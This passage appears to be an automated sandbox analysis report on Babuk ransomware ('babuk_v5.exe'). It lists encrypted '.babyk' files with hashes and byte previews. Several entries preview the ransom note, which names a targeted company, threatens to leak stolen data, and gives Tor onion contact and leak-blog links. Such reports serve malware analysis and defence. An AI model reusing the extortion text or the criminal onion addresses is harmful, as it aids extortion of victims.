                                                                            SHA-256:7D2C0944E2C8E0ABC027F045D2000D0901D3E3AAF69E5D2326E5305BF5A45921
                                                                            SHA-512:CA458E9FB0129CD137F56489B3607E3A84CE34383D7B3C0FCFDFDAE543091F8E05E67D3CF0261E2FA5D8BD69CF410813672C2E6D0088AE090E45B9CDC7BF9C4C
                                                                            Malicious:false
                                                                            Preview: X.$y.m..>W..K...oC.Bb.mK..A;.R.R.g...k..*t.........gw.......-..Y..^.O.[........~.(.9..{Qt`.u.K.0^..$O.."e.xG`.|..-.J*.m.........}..#... k)...U/<..M......q.f;....(......1.{..3p.v... .5.Qd>?r.l...Vg.k.E.a.....i.B......z.i.$.,..m..D..3..e.a......M...w...2....3..e..t...(.....\..s._...Z..^.#..i..4..%.p..*S.....d&....%.C]..*.["...\.h.s|.D..8}3D."Jf6iL.....-.`:x....X5..X.<y.!.3v.....bV.v*..G....AZ."JgSog...F'.....c.........t.b.[./|q......p#s.K.=..4z....p?c...s.k...=.....Q....]?>..[..K..C....N.C.~.u.>..8...k,.6Y........T.D.....P...M..m.A.@^.bI.UY.<$x.dT..$r.G.0.....:.c..q.U....m..../A3....fq....-..o.jy.....ay...Tk.K......|q.=.p.T.y-{.|kjRh............=.o..CY.sd.L .wm..u&..ty....-#\|.....>>E>t........=...O../-2..e...h. ..p...W.oUgQN.D.M.T.e.....Q..j.,.A.LQ...C..C.!.......*..+D..x.....=..C.(:......^.....h..?4_..K."!.X.~.7..P...YN-.J.......e.z.qy..B....p.D}gR.<#...D../.&i4.3Fh...t'l..../.^....ce\....t#-C........y..O....jZ%Z;....5.F.LJ{.F..Tbu.G...
                                                                            C:\Users\user\Desktop\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.827213563770364
                                                                            Encrypted:false
                                                                            SSDEEP:24:tHizmFxcLPAU0k2g5zNHxEJJq9cB0SNCJ3wfCb+0fDtbaXhaA70kryVhwClKE:tCaFxS1jL5BRYhB0SUMCC0bpar70u2UE
                                                                            MD5:C002FF978FB925267F0B1C93321F27C1
                                                                            SHA1:C6DFB74B68C986183B1087D43F3B45A835D5A714
                                                                            SHA-256:C15F711250E82174C240E3F6DAB5893527854A3F17323BB67C839561BF673BCF
                                                                            SHA-512:1F5E9A71224FA066E6C2D19CAC140E69C1C0A18E77F6E10B8C505287AC8526C24F153180662C6A48D4D3170A9AF6875B6287E005B2F77EE522C61D82B0312F3D
                                                                            Malicious:false
                                                                            Preview: .e......M.....G.|S...........T.H.G....e7.......h.5..._.P..H._h..kbR......n.....-...cL..AHE.......uX.h>b.L|.!F.@i.......NP..b.......2.L....]...}ix....g?...er.Pm....o\..Zyq..O=..w.z...5V.2.Q.Q.s9...d$).N....-:e....]nLJS.......)/EvF..)-.!`..M..*|.....~x........h.mG~......)6..K..<....-......V......M.....WC...p........(.iF.$e.e?...:.Io.P...!...Ue.-u..(Eg...z25.Y.C..W.Zd.\jk^.A..M7....3mC.~b..]...(K.^.e;,..6.....|.u|L.JP.By.1.oy0k?..6E.b[.%..4..}.q.A.].|..dW.6/.:v5'$R\....x..].B0.......qE.....pn.#Z<.l..JZ.....0..Nv.|{Q.D.J....c..-...H..-...W..;....C.|FA.A.C6v;..c..k..bh..s.....v.F..z...X.........}..e;..,Y./.[P.U.1.i./T.......@.... ........!....6..T.....:.a...{..?q.E..|"..$..w..T.!.b;.>.t.EFd.....N.D.....&p.....VSH.....-..}x...Mwav...4...{.m.%....w.,.5E*Hn...|..?.0...m.c.Q.DP....p.`;.`.z..C0.}^.+9B...=[..En.G.a.*#.6..L....L.?..D...D.>.........g..8M.-j....dO...n.h.t.E....W$~..&.V.skt.Pg{...n.[.S.I...`</mm...Z.||.{......../....f...p.
                                                                            C:\Users\user\Desktop\Word 2016.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2836
                                                                            Entropy (8bit):7.933617104666585
                                                                            Encrypted:false
                                                                            SSDEEP:48:WnU7Xpbi9F+vv0IU2D+BcQZcvy4kVO3cVSQTOktRWYMVhubMj7Cu9hp5AlTytp:WnKXpboSv0ITKBce4COebJMGbm7Cu9/h
                                                                            MD5:EEB204C30ED7766F4A1636A4DDD7D4CA
                                                                            SHA1:5D889A7522A96C8B34E09414CFC288033B46C3F2
                                                                            SHA-256:E69992ECBD8EECB7C0B2EAF75B74C7F3478984080D8600803FB8FBD1DDC6FF0D
                                                                            SHA-512:0CC3320ABDFE06954E8844AE48C6213193794A4D5049FBC1BE89836708B4EF24707FF86B9343E7B9ED1F35180AA1B0FFF7B1C9C35704366504EB8FC4C6FA9639
                                                                            Malicious:false
                                                                            Preview: [`4..S\E......>k....,K.E......3}.A.H1...U..y..}...m.u..Y..6......RJ.{v.$Ny.x...7.T....f...........t.".".gE......-.:`e./...|..f^.A....cv...G..23.4+........Il...5gM=Or.a+;./....W....b8.G.IP....4..V.......H?..C5.`.....L...=..#...3../......y....k..Do.....QPgm.2...x.J....t.7..}...L\>......f............lb.MJ.=.&.p.h.R$..^.........q.WYw3.bf...;.j$'.5e....N..........Je....#.q.....5.5lW."..J.AM..v.UC.2..F..P.....H..`4..0..j..8.._ .`...1....^...._[...*.~..'.~8..x.Ja.......%s4...-.............QJ.@wd..+{.ij.A...`n\"f'Y..O.B......d...gF.\.............{.jb..Um...xf;...r...H<..U}..F...}.v.....S....xV...t..?.v..a[..g.).>7...o.Vb.X.r>.l....|..p\...l...r.H.-k4.I...Hi.....b6...TF.A.aZ.e..>.A...wm..*]3...+f.....6\..6.=G{cF........[....DC.....}+. .5P..bru.N=.~....u.....P..o..ju..*5......F.Z.T,=.|..x*K.+R......y..b.\..?.W..7V.._.N...s......2...Lo.<..0`.{....H....sX.H.i.x.6..y\.....Y.k.......SS ..#v.u...d.........[KdR....z..Y.o..r%...<.{.yB......!.P.8
                                                                            C:\Users\user\Desktop\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.837528282296751
                                                                            Encrypted:false
                                                                            SSDEEP:24:21fR5yDbgQjSjLfPpfHJ4rnsitxuiApRhl7GK64j3INFEDn:21fR5yDbgYS3PpfsnsiXAHhL6O3INFEz
                                                                            MD5:191E32F5BF9D10496997A5EC2A484359
                                                                            SHA1:B37EEF5943043884D82B1F5EFDE5B4364909FE98
                                                                            SHA-256:94A7504D9CE3F722F4300DCDB48BA2D058B44B3E348A68CAB34271185E206F5E
                                                                            SHA-512:01833A230979B50231416CFEB694DBBAA0B27AF0FE622C20A165BC33CCC78F2C4F3BF81115F87EE05B21033102443D63CECCA43651957D97A06F5B6E0CC46FA1
                                                                            Malicious:false
                                                                            Preview: 91....#...O.Q...a.,\..irxe........B..x;-.;.O. .'.i.....R.D.Y.DY.....Z.'........ogJ.yy.z.r....D...KkU.w..s.. .z..#...........x....S>$..NNB.Q.......(7.^........i:#..uZ.5~s>..X.8..y..3........+...D1.N./.C....k.t......U9....6."I....]..vu.OG...*.-.d *......[...^.w1.MX.....r...+B%Y.....ZwgC..r....!...&...v.f....-.ln.J.l....<..5m.=.w.eQ[.!/...}.~.S.7..@)d3..X..P.-..OL....9.f@o8<0.W^F&4..G..T]...5.-xs..5.^...E......6D.I........l....c..b...~...Y..i....d..)1..|...YF6...3....z...3q..wF...f.....F..T..'.....t\.B.+..+s...K..h}.U..JlZ..+..._w.f.JA.>%.K.....Y."T//.F$..T..........W?...~..z.Y.`.,..:\.M!.F.s....}..V.a.....V..4F..U W}.x.hj..g.B,.lC.7.l.I..@=.~...P'.r..,.cZ..a6MgV...oX{.b..>..P..F;$$.UHq.Y.$<.oZS7bL.7H..S...}..\E9..y....N..-....:...8...6%<.}.%.$@.|w..En..<I..vuJ...$..z..Z&:J....4.zh.a..%..~F.3..."...R.....W....=.E..j.C..V..........r........5F'.U.9..o`..L....!./.a...a.(..1/...6...`.(....[..<m...j...vHL..*.6.....[...Y.o.....$.....Z.8N..$...
                                                                            C:\Users\user\Desktop\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.816528475855436
                                                                            Encrypted:false
                                                                            SSDEEP:24:chEv7s5Hovw0/oUd4lQnApFW5crvrqK/DGx73DAV+Vozo2iBJ+:chEzs5Ivw0xdyDgcrvV/DGNzAV+Voc2n
                                                                            MD5:7A94AA5B83B43AA161A52E51BDB506A7
                                                                            SHA1:D7A68C5EB67C5987FFA53AE474E0E6D72DF69C42
                                                                            SHA-256:B0F8FAA427DED1AA8E7CE646BCA0302C17028047311F74391708865E77DA5680
                                                                            SHA-512:2C3317BBCDB60E90B4F5F662EAC1EE3070475D7F2EB4E94A1F2B2A4DA7A46791C7FF571A8992E20B42DFF94183969011951C411286B85E957A48F8E924C39711
                                                                            Malicious:false
                                                                            Preview: .<...v+.I..H..T.f....8...._..D...(j}M.Zi.....k.^...t9..y....#.....t...7...!Ug]..7...C....?.P....3...m..n',x-..(.C.#.&.....\..U..v.Y..G.(%.N%..^u.MR..Y..........C.y<.S~.a.":.X.....7...t..vEq,g:..M...P...2...?0.k....>.A*.'..^.ew........h.-...i..i''..I>.0R.K...uI"..j0...Zjp.....+..Lm... .RQ.D...._.6.mc;_....J..<...IQ"@..o..3N....8/^w9.(...t|..~.....K.u.@.+.......Be..+1i.G.`.cd"'.CGwZ.Z..?{.WA....;~...7.x....#m........[..,Qy.B.a.............W2YR......A'Y0.u....4!.j...kTQ5_...!..y.9....Z..W...K..~M..D..(|r..0......h..J.....9....r'...=_..OB.nxQ..../.]BfOB.OW.3-m..N.BG...r...W....&...Ku..]`y.......)C....7.......k/s.c......r..5..T...)...'x.Q^.....d.p.......=Ja..b.ho....@nhM...k.W..a..(<.7.i..JT1.t,..o.....$...t._...*..XF./.`.F.pH.......Q.=...*..+...'.T=.jp,.H.-^.r....qC...Z*.9.4.J.s.%..E....TZ...]$.....j%....{..... .KP..{...0dI..q,Vxn.......[wp_...}g...%.qH...AS..mxpM..w..z.3..Q..%<...]...{..|.3..Oq..y.....m..dQ.rI.f..U.=...3W3...9(5.....`^HK...3n.
                                                                            C:\Users\user\Desktop\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8575538085670456
                                                                            Encrypted:false
                                                                            SSDEEP:24:rwfuHhJgzust3xQ9z5413eay0pMajUOgsS312wmil4/KD4+BztsuJR60Fof1d:cfuGtBUz54FFysfUOgsG16/Klzh60Ed
                                                                            MD5:B86F85295A355A7C1CC34EC665EE4DF6
                                                                            SHA1:45D4AB8EDA46987CB6033FA0C0A672EF83323748
                                                                            SHA-256:57428D776FF64789E909C68ADE999385B39B54078481DD0CF4EBC6F21309611E
                                                                            SHA-512:3DC9BB912E6962E864F2AB2C0E12B66EA7FC276C1E26A918C7CCBEBCE48A6FEA66DC6FC062BA436CF9719B530D5C53186C1225C4F0C27EC4064A3A95538224F3
                                                                            Malicious:false
                                                                            Preview: g./...[..H\.. '..O...y........Z....d.....*.rOf.l...y&........S.F.EP@.u.A#.K.I....SC.y........WS.`...-..9Bs.T9 .H ..c^j.....`.y.#.4."S.......HH.....dANPE.H*.cB.u..1..L&........r...#.2.N..lb..G"w.#.1Ao..#7....Q..[..n....&CV..'m,V..~^...\1..<"..)..u4...5.sG..rB2...{.2..W..1.K.|W.F.2..^9........ ...E............#.9i.$0.....b.c.....~...w5e.U.d...d8..f.y..~.{1x.C>........;.-q..e.d.e...[...w5d.D ..v..HV.@$v"d(.612.A..*&.L..z.aJ....E...R...........\.T....'....8.M_...UN3.y...<.S.f.x`%..........8..(]...$....w..k...E.5.....k.r...y......[..!..@w..DB. ..T...z.<.T....\.W.9..R.$f.q....A..Z-..........o.9R.j...>[.y..!.O.H.Yl....R..sX..es.7~..^.^....^...M.:.B..%.8O.7i...q..X!(.v..E:.."X.....;..3t..^....../.^..#n..&~............i..Rmo.FN.Dl}..t*b[...#M.9.uk.;j7.....-.!.QK]}%.....O..(.b/6......g....T......h].E.~...2r....R..:.}Zr.u....=,.7U2.-J,.z.Qk...$...9m}.t..A...*..Y....%.R....zxu.82:.....J0..~\j`n../.7.2.q.;.%...`E.l..}....Q.`.y......QK.o..6.^f+..K^.X/..|V..
                                                                            C:\Users\user\Desktop\ZTGJILHXQB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.836998490283924
                                                                            Encrypted:false
                                                                            SSDEEP:24:rbSrgm69ZepgjyQs0TpQJ/wqQQ3A+Y5bBaw11VCfXG:rbSrS9IpgmQs0Tp+wU3ivtCPG
                                                                            MD5:9D6FC48BE559DA442EB10CF91D761EBE
                                                                            SHA1:573EA6627D39539275D8F6B4361E5AE7B7D63767
                                                                            SHA-256:0CAFD7A5453BC166659A86B80E3DE26598BF14BFBEED43CB844C3DC62F2CEEF4
                                                                            SHA-512:C1A713B3B6EB475EA0530C138E0AE7E025E2584DD367F5FD9E8BBC7EF1D03EF12600E580165E9C789BB8A689C401399ECD1646BA3F65ADEA2F2B9E54ACBFF105
                                                                            Malicious:false
                                                                            Preview: ..w....p..>#.."hmN{.C..T.h.l*.f_^...L..x.F....c...=..Z.Rtz...Y..p..A....F..Z.G.'.j.....!.-0..g.c.F{....s.@8.o..l.\<.?..?H..}...3..?*...S..aT...!.Qc]....17x..O.Z....1...?B7d=.v.....l..s..NS.b./...p..._.r.y.K|%.g..q...<.....a'.....:...z}{.`...)...;.U..6~...@M:....bs.[r:}....aN.V.Yn.Q..p.kq.Fh..9H.23..$..G....>..Y...U...o9.g.y....a`iS....W....il..;M....1/...\..3..........V[..h...~f{..7..(.0......Gjb>.>*.X.............$...J....i5.v..H_....T...5.N...z..K.3l..%8A0.M..i..~.V..^Zj.......0.....q.....n..|..J...Fr.9...b...C...F.y.=/....6^"...9X$t.+5...C............h..Y:.H.{.J.....c...g....S.k..vA.....e.s3s..Dn...O[....'. ..A?...f...q...$q.L...e+n.F:R.a.G.av.\..Q....6....+.."l.`..Pb.3....<...".. ..?.!-y...:.g..a.~.O.0....E.....r.5....0i..f...J[.%..K...[@.V.....c.!..@..L....fN..=..!...s+p..d...g.#&.;z..a.-gq....)..&.....|.Y.....B.".~....+$.....Dt.Qg...A)d...............,..\.zOQ....s..x......$.Z.F...w.{....u5.8.A?Ob..yJ..h':<...Cs....2.6.q)B.&_.u
                                                                            C:\Users\user\Documents\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.829972899391189
                                                                            Encrypted:false
                                                                            SSDEEP:24:pAcqzwVITShbOyi+GBr55V2aj3u90TgGz:pAcqM2Ii+GD243uInz
                                                                            MD5:AC6063FF5AF7055897CEE3C86945EE9C
                                                                            SHA1:ADF2F7894D1567724EF2D0E649C78EC76776B3DB
                                                                            SHA-256:639459331D9346CF50EE6DE2E981CEEBE2417DCB1FED3275A99A7EE5195DBD32
                                                                            SHA-512:CA0BCFB7A4D6317CD23A4ED8B1E04F9DD3D0260C6E8976DDB8FDD1234DB30CE2C1FE7C288DF71E1E561A0D632C69B448046F8BEB6A078AF4C836E610FC3F9CC1
                                                                            Malicious:false
                                                                            Preview: .2-v...............7.6...]..'=.K..4eJ..ZNM..i.*...@.~wzkfg\S...*...^....r.*.[f..B.QT....p...._..R.Y....ab.*...O......Xk....cbJ.E.T...P.V'4{..+~...+.K......N....Mx.."P.)..n..+..+..J&\......8R.1....fJ.0.#...L#....#V-..`T..?w...GT..u/.....(........#..a.c.Ez.OIN....6..$....-F..T....5...~.X.gHD....f\...\...".<..g...}2..............#....gt...w.............)m[Va.Pe..z.....<.^..GN...J.d.%`x~...R...dH-IJ.D65.H.s}u.^4..6.....:..t..4..`$..w?Fi.G.l..y.c.waFaT.T)vhw....6.g8.@OY..sb..jM6.7!"U..+.........E)?P....,....O+y..#`H......Z].bO.. ...;..&..2'Cy..\....(U...PN*.3._.T`n...!@*4.K.....C.'...2&. ..c..b....6..r.."."3F.-R.. Ry+...~.Z...s.QjK......w..G...(.Ps.jWg.z..g.....m8.............m.2#.^_....o6..1...Hg.|..........%.&.T....6...X...fg[1.z.).P..A...{..n.....s6.B..7....G.7 .+.....n.`l?./..A.w...S-..@....J?...'......awE....A+q.............2.7V.'...LJM.....O...>.m.{+...:..\..a..+B..S?...O..T.x.....@Y..,:3R'.<...}.0..\.7...uQ.-..&v8.......Q.{9B
                                                                            C:\Users\user\Documents\CURQNKVOIX.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.840021286332168
                                                                            Encrypted:false
                                                                            SSDEEP:24:pXy7Jxksn1utczbrbws00hEl2SE/VlcNxKYCnzJrwOKGyXVtX:1y7o4utczbr30PHE2GzRwOKGah
                                                                            MD5:71C2063C23EBA1592FDE934842C219BB
                                                                            SHA1:E51696E91294B2DC24650673EDB57419CB942C7C
                                                                            SHA-256:D36D890A2AB190C63DB3ACFE26E960AA1D6B029055826752D63A5C4B405BE8C0
                                                                            SHA-512:2A8FBFC8ACE74DC8B7A29346E5AAE7602CAE743D10B0D04D0F396A3861B185F03DA90AAC0A283C9146F09DE8CCEDE8CF01D30C3FD260572041751FC33000358D
                                                                            Malicious:false
                                                                            Preview: .....~.d.......c;z..p..Y....u..@......j..3e..z.......}..@.....$,...P...4..$...7>..\l.L.5..c=.S%I.3z....]5....B...p.P.S...J......=.`.y...Z.b=w....(....._X..T..K.l..q....?........X_/.o.b/X..Y.........,.?qD.....BE.......&,.Z8..B..|r?..M....O].....ug...F.....V..M...t......&92|D..%...LZ......&Jr...&.M(.D...YBNZ.l...A5.z..d.c!..n..\.h...C.q.F..x/...i......~..3...a../J.......Q.F..........xx.yI..0.G..."....kX....%-.e..$....No...`6..ty.D....dh#f1...............f?m.J.M..Iu.ri...'..i#..s\EP...A....U.....$.....u1.....!.......{{......`i"...L.....&:.#.....{...N....?.?E.H>s.*#T.*.w.a.K.....d..*_..P>}.kze..^.B......y.fEt.Z...|.........u.aB.....7G.F..X*'...Nl.J......C.....?R....U..SX.i{4..r.._.%g.......S.ER....Lc....)^F}.,.|.t...D.L.....y.WC....W.6.<..i...W..=...#'P.ez.zU..|...|......U...=yE..h..@.9...F....y....5..V@.8..{...W..@.b..1..QJ...)..:}O..A..j._.c..........Rnr...WY..05.>.n{......>..U..i...7.*.2.$.n......iR..y2u..;R:..N.}....8=...d-q...S..U..x.....p.R.
                                                                            C:\Users\user\Documents\CURQNKVOIX\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.830813767661178
                                                                            Encrypted:false
                                                                            SSDEEP:24:XnErmvuLGCwEUmosY9CsaOzrBDALL1r1zD0zVdPLOZGP3/nn1ssYLqOvs:XChwEUm5XNuNAVrhUfvXSsYeOU
                                                                            MD5:E9A5920310E78DE223FF624E393AA11B
                                                                            SHA1:13A7B4B457FEA68DB20755BB958A452219522447
                                                                            SHA-256:EEDF44166077FF3626DEC202D12696E785244D03DB448906DED0498AC706843A
                                                                            SHA-512:75F99C16B734CA2B957D9086BAF34F39AF23C63B6B0F4918DE2B12446C30A6412768242B0DF39942584E00474112B83CD9A42343835CD0681FBC88CB7D527959
                                                                            Malicious:false
                                                                            Preview: .6..e..x....Z...D..U^.&......dw..D.9......3.qS..].......{f.Z@oK...;x.~..};M8.........,FG....7..++.sx..t.S.l..&......R..Z..Y.b....r.],.C..MD.. b.^..`.M....m....>z..M8.t.1imV..HE.v......k........>..T.....*..Z...0.@S..^F.#v..c..B..,...1...O....N.1......@3to.8...w.,.0.Q/Q>.t........iCW.@....nSh.&;.[z..]Z.1.....]...v..r .....]..3...a..<.yD.....6.#o.%.h..\W.8..].......22I..'....u.f|.....{|.{a.c..:.5#....j..5...N..%.qA..N.n...n.`K_V.T.0....9..........HpR[S.#...A.e./..$. ...)+_.@..T.......=.g..V(.f..+'... i.\.x_.X..|6.......P:...{o.2|......tJ.Tc......v..9j..Q...........E.U~\......J..x......\.X<...^.......f47C.....S....3^e...qp>..G1m...e]..a..y.I..4S.3c..w.4Jd_......# ....$.%1.;..@C@*.r.Ds.....s....S...`U....Zi..Md.?.T|.....-U.#D.kP..Z.............To)...V.z.h>.a............Ci./g..s.3......;..}Is(S.p..\......x.hL....U.g.4.....|....x...Pr..L;...q._-..4:r...NI6..X+.y`?.ZT..e<.~.....p.._Mr.d..;......*.....h....u.n|`0.K..t.7.uH0;s4n._...H63........D...}..t
                                                                            C:\Users\user\Documents\FENIVHOIKN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.849935636741708
                                                                            Encrypted:false
                                                                            SSDEEP:24:weXGXA1mhvEsD789dzX7S/kgVnTIjbwuFcfqx7JBcJ5LJaCrsPXWs:tsCOssnsdK/kglTIfwuFKq9J+7LvGF
                                                                            MD5:85B7C8F37142DC444CBDA99F49D83302
                                                                            SHA1:007B0746B9BA439D6DA5A4B29C0644502B7AA3E4
                                                                            SHA-256:34C4561B11DEB0C7BB328A43BAB16CCD0C97491A04B13C930291219803C51DAA
                                                                            SHA-512:9308F8160F62B8722072CE7ACB0F9477AE5BE57F1528E6BCA0104793C2D89A37782654BA421DB0F451D8384E8195AAD7CCAB745E5E852C3C94861789F4296249
                                                                            Malicious:false
                                                                            Preview: w.2.S..Y.........IG.G2..D..!.)==:...bG......<0p.......X..7*zNQk._.T..ct.(..vgKc...$~.d.C.....}.%..2Fz......|Q...E.&...Hs.z..,}).....A...c.l....*9.B..Tv/.*.E.z..Q.....U;...../..3Fh.t..4X.Y.....L....2..TD.lD.h..h..D...!.SF.A....*.Gg........b..........|......&....zs-Z:..W.........M?}C.w....q.s{s."FZ8...3....i{...w..I.Lc.9n.RI.3p.Rh.~..>.....!K...a......U=...Y....5....(.RP+..~"F...z.+.k.F...\K.z.<.?5..M .....(BcD..r.?......[...!..h9h./..:.....C..w`....xH.{~...Y...a..B~*.p.=.+..!..{>!Q|s.E....`2..(.z...@.|..B...vla....+.#..t?.....`\....qc.$.P..K.}....Sf.qK....;....W..B..Q.....7....DR.@E.Zj.p...$....-...J.'.Sjh-.Y....-.H..p]k%.?......A...e.5...F...YA...G..'....+..<,VO.h..O...2..8M...s......g?`.....C.42.E.yA.X.......)..%.1....!..]....T@.zhA.<_...N........te.U..(./...t.\...6.}{......Un.....!.c...@...Z..bF.7D....!u..M..4q}b.... -CL...bf...g,-.Qp..6..i.....Wb.7..1.8.].#c...*..gk......k>f..P...f..fP....*e..O......S......#...4.<............
                                                                            C:\Users\user\Documents\JSDNGYCOWY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.827258324278315
                                                                            Encrypted:false
                                                                            SSDEEP:24:N89Ow6lz40WckNn3Yg8SnA606x77WqWbqnNIQcaIh4bvm0qL4qq+oel9aZH:C/w2n2+x/WqWsEaIh4aXXBrs
                                                                            MD5:30F0FF7FD24BA9DE7FC861CE937374C1
                                                                            SHA1:8A356A4134371A562B92E97E73AC726953D4A913
                                                                            SHA-256:6B8A4D9F1DA1E950F308ABD86A74537520B1576FB9A8F36FBC0EFC386A59A06C
                                                                            SHA-512:B507A76C4041DFA2F9C7B3E34811AB7C87C3975D0FB2DBD15F0ACAE7797B4032614F96BE677588C0EFEEEEA7EC1A3C482C016EC101B2F311BA5CC1D9D51488B1
                                                                            Malicious:false
